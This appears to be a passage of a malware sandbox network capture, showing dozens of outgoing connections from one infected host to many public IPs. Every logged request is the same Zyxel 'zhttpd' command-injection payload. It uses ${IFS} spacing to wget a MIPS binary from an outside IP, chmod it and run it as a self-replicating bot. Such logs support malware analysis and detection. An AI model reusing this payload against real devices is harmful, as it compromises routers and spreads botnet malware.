                                      Jan 14, 2024 15:51:01.644145012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8092192.168.2.1453166162.234.246.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644251108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8093192.168.2.143328080.89.157.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644285917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8094192.168.2.145064831.127.102.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644292116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8095192.168.2.1450168131.208.187.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644334078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8096192.168.2.1443132160.128.32.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644365072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8097192.168.2.1434388103.190.252.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644402981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8098192.168.2.1454718201.176.124.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644453049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8099192.168.2.144529852.211.241.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644504070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8100192.168.2.1459750150.148.27.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644572020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8101192.168.2.1451096221.28.94.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644587040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8102192.168.2.1453102121.34.8.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644588947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8103192.168.2.145662832.141.230.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644625902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8104192.168.2.144040445.228.171.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644680023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8105192.168.2.1437568128.97.148.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644730091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8106192.168.2.1442068110.62.31.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644762993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8107192.168.2.1450694196.4.122.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644819021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8108192.168.2.143375050.97.89.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644838095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8109192.168.2.1439000207.134.9.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644870996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8110192.168.2.1451856166.162.143.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644915104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8111192.168.2.1451386213.226.8.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644952059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8112192.168.2.1460400154.25.55.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.644993067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8113192.168.2.1447926194.38.229.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645064116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8114192.168.2.144886081.152.91.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645088911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8115192.168.2.1448926173.29.126.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645134926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8116192.168.2.144838048.195.63.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645169020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8117192.168.2.1441946177.124.87.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645217896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8118192.168.2.1441884119.80.186.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645262003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8119192.168.2.1440252125.194.168.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645320892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8120192.168.2.1445288154.108.25.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645351887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8121192.168.2.1452802152.134.87.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645385981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8122192.168.2.144792441.245.245.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645440102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8123192.168.2.1433176153.6.243.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645476103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8124192.168.2.1453212168.49.53.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645509958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8125192.168.2.1459880190.122.203.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645539045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8126192.168.2.143928887.106.204.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645567894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8127192.168.2.144127868.145.131.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645595074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8128192.168.2.144181245.33.206.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645642042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8129192.168.2.145392657.73.111.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645685911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8130192.168.2.144250235.49.248.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645710945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8131192.168.2.1434228162.45.244.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645764112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8132192.168.2.144466697.164.153.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645787001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8133192.168.2.1433570101.190.159.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645818949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8134192.168.2.1448768147.142.218.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645860910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8135192.168.2.1456200219.29.215.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645900965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8136192.168.2.1452306164.44.189.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645941973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8137192.168.2.145949261.51.195.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.645986080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8138192.168.2.1456952175.164.109.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646018028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8139192.168.2.1446984110.194.54.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646064043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8140192.168.2.1448054217.80.182.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646105051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8141192.168.2.145648898.7.135.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646146059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8142192.168.2.1457064100.60.30.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646193981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8143192.168.2.145448820.90.118.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646239042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8144192.168.2.145200473.136.195.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646284103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8145192.168.2.14354325.72.191.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646316051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8146192.168.2.1439010175.223.135.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646373034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8147192.168.2.144976875.129.245.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646419048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8148192.168.2.144447692.174.142.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646459103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8149192.168.2.1458732153.237.34.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646498919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8150192.168.2.1458226108.230.98.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646560907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8151192.168.2.1447446179.5.136.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646595955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8152192.168.2.1441324171.214.129.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646620035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8153192.168.2.143961282.156.0.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.646650076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8154192.168.2.144343620.51.41.120443
                                      TimestampBytes transferredDirectionData
